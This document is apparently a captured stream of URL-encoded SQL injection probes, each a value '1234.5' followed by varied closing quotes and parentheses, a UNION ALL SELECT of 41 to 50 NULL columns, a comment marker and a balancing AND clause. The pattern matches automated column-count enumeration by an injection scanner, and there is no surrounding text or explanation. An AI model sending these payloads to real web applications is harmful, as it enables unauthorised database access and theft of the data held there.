1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%287282%3D7282 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%287612%3D7612 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%284682%3D4682 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27vPin%27%3D%27vPin 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27oeQH%27%3D%27oeQH 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27aRKi%27%3D%27aRKi 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27fIMm%27%3D%27fIMm 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27Cuhj%27%3D%27Cuhj 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27wEXX%27%3D%27wEXX 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27Jtse%27%3D%27Jtse 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27xbDv%27%3D%27xbDv 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27xEpn%27%3D%27xEpn 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27jwiD%27%3D%27jwiD 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27lxRx%27%3D%27lxRx 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27gYzh%27%3D%27gYzh 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27gVGG%27%3D%27gVGG 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27LHJh%27%3D%27LHJh 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27EGNm%27%3D%27EGNm 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27gSAn%27%3D%27gSAn 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27abHX%27%3D%27abHX 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27NTcQ%27%3D%27NTcQ 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27XHeC%27%3D%27XHeC 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27juWd%27%3D%27juWd 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27eFeJ%27%3D%27eFeJ 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27cmAc%27%3D%27cmAc 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27GptB%27%3D%27GptB 